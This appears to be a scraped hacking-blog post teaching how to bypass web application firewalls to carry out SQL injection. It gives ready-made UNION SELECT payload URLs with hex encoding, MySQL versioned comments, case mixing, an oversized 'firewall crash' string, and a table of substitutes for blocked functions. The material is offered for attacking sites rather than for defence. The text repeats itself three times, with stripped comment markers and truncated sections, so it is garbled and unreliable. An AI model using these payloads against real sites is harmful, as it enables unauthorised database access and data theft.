ByPassing WAF | Advance Methods | Backtrack Tutorial 2013

Monday, December 3, 2012

ByPassing WAF | Advance Methods

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

If you do not read my first post on BASIC WAF BYPASSING then read it here Basic Method

1) Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

    http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/!uNIOn/+/!SeLECt/+1,2,3,4….

    (( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//!50000%55nIOn//yoyu/all/**/%0A/!%53eLEct/%0A/nnaa/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.
Example:

http://www.site.com/index.php?page_id=-15 /!u%6eion/ /!se%6cect/ 1,2,3,4….
(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):

http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:

Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()

4) Misc Exploitable Functions:

Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:

    This firewall below replaces “” (asterisks) with Whitespaces! What we can do is this:

    http://www.site.com/index.php?page_id=-15+union+select+1,2,3,4…

    (If the Firewall removes the “”, the result will be: 15+union+select….)
    So, if you find such a silly function, you can exploit it, in this way! :-D

[+] In addition to the previous example, some other bypasses might be:

    -15+(uNioN)+(sElECt)….

    -15+(uNioN+SeleCT)+…

    -15+(UnI)(oN)+(SeL)(ecT)+….

    -15+union (select 1,2,3,4…)

I hope this post will clearly understand you how you can bypass the WAF.........

No comments:

Backtrack Tutorial 2013

Pages

Monday, December 3, 2012

ByPassing WAF | Advance Methods

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

If you do not read my first post on BASIC WAF BYPASSING then read it here Basic Method

1) Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

    http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/!uNIOn/+/!SeLECt/+1,2,3,4….

    (( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//!50000%55nIOn//yoyu/all/**/%0A/!%53eLEct/%0A/nnaa/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.
Example:

http://www.site.com/index.php?page_id=-15 /!u%6eion/ /!se%6cect/ 1,2,3,4….
(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):

http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:

Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()

4) Misc Exploitable Functions:

I hope this post will clearly understand you how you can bypass the WAF.........

No comments:

Post a Comment

Popular Posts

Blogger templates

Labels

Blog Archive

Backtrack Tutorial 2013

Pages

Monday, December 3, 2012

ByPassing WAF | Advance Methods

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

If you do not read my first post on BASIC WAF BYPASSING then read it here Basic Method

1) Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow! http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…. (( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…. If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.Example: http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…. (which means “union select”)Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):

http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:

Apart from the “UNION SELECT” other commands might be blocked.Common Commands Blocked:COMMAND | WHAT TO USE INSTEAD@@version | version()concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDUgroup_concat() | concat_ws()

4) Misc Exploitable Functions:

I hope this post will clearly understand you how you can bypass the WAF.........

No comments:

Post a Comment

Popular Posts

Blogger templates

Labels

Blog Archive

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/!uNIOn/+/!SeLECt/+1,2,3,4….

(( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//!50000%55nIOn//yoyu/all/**/%0A/!%53eLEct/%0A/nnaa/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method! ))

We can replace some characters with their HEX (URL-Encoded) Values.
Example:

http://www.site.com/index.php?page_id=-15 /!u%6eion/ /!se%6cect/ 1,2,3,4….
(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):

Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()